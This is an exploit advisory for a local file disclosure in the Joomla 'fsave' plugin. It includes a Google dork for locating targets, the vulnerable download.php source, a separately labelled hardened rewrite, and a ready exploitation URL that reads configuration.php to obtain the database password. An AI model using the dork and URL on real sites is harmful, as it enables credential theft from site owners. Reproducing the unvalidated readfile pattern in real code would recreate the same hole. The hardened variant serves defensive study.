Joomla <= (fsave Plugin) Local File Disclosure Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] Skype : knockoutr@msn.com
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com
[~] Greetz : b3mb4m, ZoRLu, Sen Haxor, Ne0-h4ck3r, KedAns-Dz ( milw00rm.com )
===================================================================
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Joomla
|~Plugin : fsave
|~Affected Version : 2.0
|~Software : N/A
|~RISK : High
|~Google Dork : inurl:plugins/content/fsave/
===================================================================
======================Info=========================================
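The database password is stored in "configuration.php", so reading that one file is sufficient to obtain it.
Local files on the server can be read through this plugin.
The cause is incorrect, careless coding in the "download.php" file: the "filename" GET parameter is appended to JPATH_BASE and passed to readfile() without any validation.
The code responsible is laughable :)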
============ Error lines in download.php ===========================
<?php
define('JPATH_BASE', dirname(dirname(dirname(dirname(__FILE__)))));
$file = JPATH_BASE."/".$_GET['filename'];
header('Content-Description: File Transfer');
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=".basename($file));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header("Content-Length: " . filesize($file));
ob_clean();
flush();
readfile($file);
?>
======================================================================
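A hardened variant of the script above, as an added example (not the plugin's own code and not from the advisory author). It assumes downloads are kept in a dedicated directory and limited to a few extensions; the names FSAVE_DIR, fsave_resolve, the directory path and the extension list are hypothetical.

```php
<?php
// Added example: hardened variant of download.php. The storage directory
// and the extension allowlist are assumptions, not the plugin's own values.
define('JPATH_BASE', dirname(dirname(dirname(dirname(__FILE__)))));
define('FSAVE_DIR', JPATH_BASE . '/images/fsave');   // hypothetical location
$allowedExt = array('pdf', 'txt', 'csv');             // hypothetical allowlist

// Resolve a user-supplied name to a file inside $baseDir, or return false.
function fsave_resolve($baseDir, $name, array $allowedExt)
{
    // Reject arrays, empty values and embedded NUL bytes.
    if (!is_string($name) || $name === '' || strpos($name, "\0") !== false) {
        return false;
    }
    // Drop any directory component the client supplied.
    $name = basename(str_replace('\\', '/', $name));
    $ext  = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        return false;   // configuration.php and every other .php stop here
    }
    // Canonicalise both paths so symlinks and ".." cannot leave the base.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name);
    if ($base === false || $path === false || !is_file($path)) {
        return false;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : false;
}

$requested = isset($_GET['filename']) ? $_GET['filename'] : '';
$file = fsave_resolve(FSAVE_DIR, $requested, $allowedExt);
if ($file === false) {
    header('HTTP/1.1 404 Not Found');
    exit;
}

// Restrict the advertised file name to a conservative character set.
$safeName = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($file));
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: attachment; filename="' . $safeName . '"');
header('Content-Length: ' . filesize($file));
readfile($file);
```

The containment check runs on the canonical path returned by realpath(), so a request for configuration.php fails on both the extension allowlist and the directory prefix.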
======================== Tested on Demos ============================
=======================================================================
========================= Exploitation ====================
http://[TARGET]/plugins/content/fsave/download.php?filename=configuration.php
=======================================================================